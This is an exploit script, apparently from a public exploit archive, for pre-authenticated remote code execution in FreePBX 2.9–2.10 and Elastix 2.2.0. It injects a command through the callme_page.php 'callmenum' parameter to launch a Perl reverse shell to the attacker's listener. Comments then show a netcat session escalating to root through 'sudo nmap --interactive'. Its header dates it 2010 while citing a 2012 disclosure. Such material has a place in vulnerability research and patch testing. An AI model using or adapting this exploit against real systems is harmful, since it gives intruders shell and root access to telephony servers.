FreePBX 2.10.0 / Elastic 2.2.0 Remote Code Execution

`#!/usr/bin/python  
############################################################  
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit  
# Google Dork: oy vey  
# Date: March 23rd, 2010  
# Author: muts  
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.  
# Tested on: multiple  
# CVE : notyet  
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/  
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt  
############################################################  
# Discovered by Martin Tschirsich  
# http://seclists.org/fulldisclosure/2012/Mar/234  
# http://www.exploit-db.com/exploits/18649  
############################################################  
import urllib  
rhost="172.16.254.72"  
lhost="172.16.254.223"  
lport=443  
extension="1000"  
  
# Reverse shell payload  
  
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'  
  
urllib.urlopen(url)  
  
# On Elastix, once we have a shell, we can escalate to root:  
# root@bt:~# nc -lvp 443  
# listening on [any] 443 ...  
# connect to [172.16.254.223] from voip [172.16.254.72] 43415  
# id  
# uid=100(asterisk) gid=101(asterisk)  
# sudo nmap --interactive  
  
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )  
# Welcome to Interactive Mode -- press h <enter> for help  
# nmap> !sh  
# id  
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
  
`